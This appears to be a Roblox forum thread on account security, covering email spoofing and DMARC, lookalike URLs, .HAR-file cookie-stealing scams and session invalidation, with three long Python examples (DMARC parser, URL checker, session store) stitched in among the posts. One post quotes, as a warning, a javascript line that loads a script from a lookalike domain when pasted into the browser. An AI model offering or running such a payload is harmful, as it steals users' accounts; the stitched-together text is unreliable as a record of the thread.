Securing your Account PSA

I appreciate u reminding us of this :smiley:

Two words, cookie grabbing. It should be mentioned anyone suspicious, e.g. scammers are getting players to follow a tutorial for them just release a file that includes their cookie for example (.HAR file)

1 Like

Just also to add something to the post, I highly recommend checking if the email is a real Roblox email and is not just an email address owned by Roblox being spoofed. If you do not know what email spoofing is, it is basically just someone sending messages from a domain which looks like they are from a domain they don't own (it will not really be sent from that domain; it is just the way emails work makes them look like they have come from the user). Highly unlikely with Roblox due to them only using the main domain for emails I believe, however someone could spoof an email with a sub domain (e.g. security.roblox.com) due to the DMARC record being set to "none".

@lycheeperson10 Someone at Roblox might wanna look at the above! Not a major issue due to the main domain name having a DMARC record set to none and the sub domain not really being used, but still someone could trick others using this!

If you're unsure how to check if an email is being spoofed, or just want to learn more about how emails can be spoofed, I highly recommend this YouTube vid below:

1 Like
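To make the DMARC point above concrete, here is a small added example (my own illustration, not code from the post or anything Roblox publishes) that parses a DMARC TXT record the way a receiving mail server would and reports what the policy leaves open. The two records and domain names in it are constructed; a real check would fetch the TXT record at `_dmarc.<domain>` from DNS instead of the table.

```python
"""Parse a DMARC record and list what it does not protect against.

Added illustration; the records below are constructed and the domains are
made up. Real use would replace SAMPLE_RECORDS with a DNS TXT lookup.
"""
from dataclasses import dataclass
from typing import List, Optional

# Constructed TXT records keyed by the DNS name they would be published at.
SAMPLE_RECORDS = {
    "_dmarc.main.example": "v=DMARC1; p=none; rua=mailto:dmarc@main.example",
    "_dmarc.strict.example": "v=DMARC1; p=reject; sp=quarantine; adkim=s; aspf=s",
}


@dataclass
class DmarcPolicy:
    domain_policy: str      # p=  : what receivers do with mail failing DMARC for the domain
    subdomain_policy: str   # sp= : same for subdomains; defaults to p (RFC 7489)
    dkim_alignment: str     # adkim= : r (relaxed) or s (strict)
    spf_alignment: str      # aspf=  : r (relaxed) or s (strict)


def parse_dmarc(record: str) -> DmarcPolicy:
    """Split 'tag=value; tag=value' into a policy, validating the mandatory tags."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed DMARC tag: {part!r}")
        name, value = part.split("=", 1)
        tags[name.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("missing or wrong v= tag; not a DMARC record")
    if "p" not in tags:
        raise ValueError("a DMARC record must carry a p= tag")
    p = tags["p"].lower()
    return DmarcPolicy(
        domain_policy=p,
        subdomain_policy=tags.get("sp", p).lower(),   # sp falls back to p when absent
        dkim_alignment=tags.get("adkim", "r").lower(),
        spf_alignment=tags.get("aspf", "r").lower(),
    )


def policy_for(domain: str, records=SAMPLE_RECORDS) -> Optional[DmarcPolicy]:
    """Look up _dmarc.<domain> in the constructed record table."""
    record = records.get(f"_dmarc.{domain}")
    return parse_dmarc(record) if record else None


def assess(policy: Optional[DmarcPolicy]) -> List[str]:
    """Findings a defender would raise about how spoofable the domain is."""
    if policy is None:
        return ["no DMARC record: receivers apply no DMARC policy at all"]
    findings = []
    if policy.domain_policy == "none":
        findings.append("p=none: mail failing DMARC for the main domain is still delivered; "
                        "spoofing of the exact domain is reported, not blocked")
    if policy.subdomain_policy == "none":
        findings.append("sp=none (or inherited from p=none): mail claiming any subdomain, "
                        "used or not, is still delivered")
    if policy.spf_alignment == "r" and policy.dkim_alignment == "r":
        findings.append("relaxed alignment: any subdomain of the organizational domain "
                        "counts as aligned")
    return findings


if __name__ == "__main__":
    for domain in ("main.example", "strict.example", "missing.example"):
        print(domain)
        for finding in assess(policy_for(domain)):
            print("  -", finding)
```

The `sp=` fallback is the detail the post is about: with `p=none` and no `sp=` tag, a receiver evaluating mail from an unused subdomain inherits `none` and delivers it, so the only thing a `p=none` record buys you is aggregate reports.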

Iirc they are already encrypted, although there isn't much point in that because they are accepted as encrypted when authenticating

There is another type of hacking that is going around. Basically the hacker deceives you into pasting javascript into the search bar.

The Details

This is the code that one particular video tells you to paste. DO NOT PASTE THIS CODE (just for education purposes and for employees to see): +Javascript:$.get('//configure'+'roblox.com/api/catalog/promo/halloween50newuser.js') They make it actually look a little legit for the untrained eye.

The problem is made worse by videos like these.
Here is the video link. DO NOT FOLLOW THE STEPS IN THE VIDEO, YOU WILL GET HACKED.
ROBLOX- GET ANY ITEM ON THE CATALOG FOR 50% OFF (HEADLESS HORSEMAN FOR 15,500 R$!) - YouTube
This video has been up for years and has over 100k views. This is an example of one of the many hacking methods I commonly see.

How would you do that? Roblox already enforces the httpOnly flag on security cookies to lower the chances of an XSS attack. Cookies are stored on your PC, so for example if a player is tricked to install something like "free robux app" they can steal the cookies

1 Like

So as a general rule, all Roblox URLs will contain "[something].roblox.com". I.e. create.roblox.com, developer.roblox.com, as well as www.roblox.com among others.

The main point is to be aware of URLs which contain variants such as "roblox.com.[something]" as an example.

1 Like
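The "[something].roblox.com" versus "roblox.com.[something]" rule is easy to state and easy to get wrong in code, so here is an added example (mine, not from the post or from Roblox) of a host check done properly: it parses the URL, takes the real hostname (so `roblox.com@evil.example` and ports do not fool it), and only accepts the apex or a dot-anchored subdomain of it. The allowlist holds just `roblox.com` as an assumption; `ro.blox.com`, which the thread mentions later, would be rejected by this check because it is a different registrable domain, which is exactly why an official short domain needs to be on an allowlist to be trusted.

```python
"""Decide whether a URL really points at an allowlisted first-party domain.

Added illustration, not code from the forum post or from Roblox. The
allowlist is an assumption for the example.
"""
from urllib.parse import urlsplit

# Apex domains treated as first-party (assumed allowlist for this example).
TRUSTED_APEXES = ("roblox.com",)


def is_first_party_url(url: str, apexes=TRUSTED_APEXES) -> bool:
    """True only if the host is an allowlisted apex or a genuine subdomain of one.

    The comparison is anchored at a dot, so 'roblox.com.evil.example' and
    'evilroblox.com' never match, and it uses the parsed hostname so that
    userinfo tricks ('https://roblox.com@evil.example') are seen for what
    they are.
    """
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False
    if parts.scheme.lower() not in ("http", "https"):
        return False                 # javascript:, data:, etc. are never first-party
    host = parts.hostname            # lowercased; userinfo and port already removed
    if not host:
        return False
    host = host.rstrip(".")          # normalise a trailing root dot
    if not host.isascii():
        return False                 # raw IDN lookalikes need a human, not a suffix match
    return any(host == apex or host.endswith("." + apex) for apex in apexes)


def classify(url: str) -> str:
    """Label a URL for a user-facing warning."""
    return "first-party" if is_first_party_url(url) else "REVIEW"


if __name__ == "__main__":
    for candidate in (
        "https://www.roblox.com/home",
        "https://create.roblox.com/docs",
        "https://roblox.com.evil.example/login",      # constructed lookalike
        "https://www.roblox.com@evil.example/",       # constructed userinfo trick
        "https://ro.blox.com/",
    ):
        print(f"{classify(candidate):12} {candidate}")
```

Note that a URL typed without a scheme (`www.roblox.com/home`) is also rejected, because without a scheme the parser cannot tell the host from the path; normalise input by prepending `https://` only if you trust where the string came from.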

But what about ro.blox.com? It's apparently official, but it looks very suspicious.

4 Likes

That is official for mobile links. We are looking into standardizing them going forward. Stay tuned!

4 Likes

I have never had the option in the US

1 Like

What exactly do you mean by this? I would like it to use share.roblox.com, but it's completely empty. ro.blox.com returns an unauthorized error, and blox.com returns to the homepage.

edit: It changed, it used to be an empty API endpoint, but now it returns "OK".

1 Like

If you're looking into educating users on off-site scams, you should add something regarding the .har file scam. There are two I've come across personally:

1- Person says they'll give you Robux in exchange for your "avatar file", they get you to upload a .har file to a "har to obj" converter, which in reality uploads it to a database somewhere. They usually attach a video of someone following this process, this video usually depicts a clip of someone rich/reputable doing this (which is usually just clips taken out of context, mashed together to create a surprisingly believable product) for the person being scammed to trust this person.

2- A person messaged me on Discord with the same type of message (avatar to be used in-game), however instead of uploading the file to a .har to .obj "converter", you upload the .har file directly to them on Discord.

Just donā€™t upload any files to strangers on the internet, especially if these people message you randomly.

2 Likes

Do .har files contain your cookie or something? As far as I know your har file is just your avatar.

1 Like

Yes.

1 Like

Due to the way that email is designed, it's pretty easy to spoof emails that look like legitimate emails. The trick though, is origin, where the address to @roblox.com emails would point to an email server that originates from Roblox. Still, you can send a perfectly legit looking email using a @roblox.com email through spoofing. So, personally, this point only applies to very rudimentary phish attempts.

—

Otherwise, the majority of these issues stem from Roblox's young user base which are predominantly not actual developers, where the visibility of this announcement/PSA will not reach the members who're actively being targeted. In regards to that, the platform needs to do more in targeting these announcements to actual players instead of just developers.

This is an issue on the majority of platforms but, at some point a line needs to be drawn and the user who fell for said phish needs to take responsibility for their own actions. That is how the world works. I feel that Roblox is essentially trying to make up for the lack of online safety instruction that parents should've taught. Unfortunately, losing something is how you grow and hopefully, how you realize that certain actions you make can lead to serious consequences.

Regardless of how anyone tries to spin it, how a phish attempt is engineered or whatnot, this platform is specifically designed in such a way where you have to give your details to them. If they successfully get your details, it's simply because you gave it to them. Whether you realize that or not, is completely up to you and unfortunately, probably too late.

The only way for this not to be the case is if your details are leaked either through you, a friend, etc, through a breach on Roblox's end or if we really wanted to be radical, someone tapping your connection between your router / phone to an ISP / Tower.

I see a lot of people on this platform blame Roblox for having poor security and while, I agree in some aspects, this in particular is not their fault. Every company faces these issues and everyone is susceptible. However, most platform users take responsibility because the age deems it so. On this platform, it's incredibly toxic and turns into "omg Roblox security sucks, give me my account back".

Start solving this problem by getting younger users to understand / conceptualize responsibility and what it means to be responsible for your account. With the guides and such in place already regarding this topic, there's really nothing else this platform should be doing.

The solution here is simple: If you really value your account, don't trust anyone with it but you.

Edit: Free will on an open forum dictates expressional freedom. Take this how you want. This is my personal view on said topic. This is not aimed toward anyone. It does not mean to offend anyone. It's simply, quite plainly, how I feel about this.

A HAR file (HTTP dump) contains captured data from your web browser. It's typically used for debugging, performance bottleneck review, etc., but people have been using it to grab cookies. Data, including all network information, is captured on a per-session basis. This means that any data sent between the client (browser) and Roblox's servers is captured in this file. This includes headers (where cookies are passed), URLs, etc. If anyone asks you for a HAR file, they're definitely malicious.

3 Likes

No longer an issue.

(Intentional)

2 Likes

It's a good security measure that IP changes invalidate the cookie but it seems a bit inconsistent? Personally, using a VPN hasn't logged me out. Even if it did, I still wouldn't want anyone having my cookie anyway, it's also a good idea to advise people that these scams do exist anyway.

It doesn't depend on your IP. The title of the bug report is misleading. It's based on your location change.

Let's say your IP changes to another IP that's in the same state or country as you are. There's a chance that it won't log you out.

But let's say your IP changes from the US to the UK. Then it will invalidate the cookie.

2 Likes
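The behaviour described in the post above, a session that survives an in-country IP change but dies on a cross-country one, is a form of session binding. The added example below is my own illustration of that mechanism, not Roblox's implementation, and its IP-to-country table is constructed to stand in for a real geolocation lookup.

```python
"""Sessions bound to the country they were issued from, not to the exact IP.

Added illustration of the behaviour described in the thread; not Roblox's
code. GEO_TABLE is a constructed stand-in for a geolocation database.
"""
import secrets
from typing import Dict, Optional, Tuple

# Constructed IP-to-country table (documentation-range addresses).
GEO_TABLE: Dict[str, str] = {
    "198.51.100.10": "US",   # user's home connection
    "198.51.100.77": "US",   # different IP, same country (e.g. an in-country VPN exit)
    "203.0.113.5": "GB",     # a different country
}


def country_of(ip: str) -> Optional[str]:
    """Country for an IP, or None when the lookup has no answer."""
    return GEO_TABLE.get(ip)


class SessionStore:
    def __init__(self) -> None:
        # token -> (user, country the session was issued from)
        self._sessions: Dict[str, Tuple[str, Optional[str]]] = {}

    def issue(self, user: str, ip: str) -> str:
        """Create a session and record the country it was created from."""
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (user, country_of(ip))
        return token

    def validate(self, token: str, ip: str) -> Optional[str]:
        """User for a live session, or None. A country change drops the session."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user, issued_country = entry
        if country_of(ip) != issued_country:
            # Fail closed: the cookie is now useless to whoever presents it,
            # including the original owner, who simply logs in again.
            del self._sessions[token]
            return None
        return user

    def is_live(self, token: str) -> bool:
        return token in self._sessions


if __name__ == "__main__":
    store = SessionStore()
    tok = store.issue("alice", "198.51.100.10")
    print("same country, new IP:", store.validate(tok, "198.51.100.77"))
    print("other country:       ", store.validate(tok, "203.0.113.5"))
    print("back home afterwards:", store.validate(tok, "198.51.100.10"))
```

An IP the lookup cannot place is treated as a mismatch, so an unknown network forces a fresh login rather than silently passing; a real deployment would tune that (and the granularity, country versus region) against how often legitimate users trip it, which is the inconsistency the VPN comment in the thread is noticing.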

Ohhh okay that makes more sense. On the chance that the person attempting to gain access to my account is somewhere near me (country is somewhat likely, province isn't), I would still refrain from giving the cookie lmao. Regardless, it still is a good and frankly much needed security measure.

2 Likes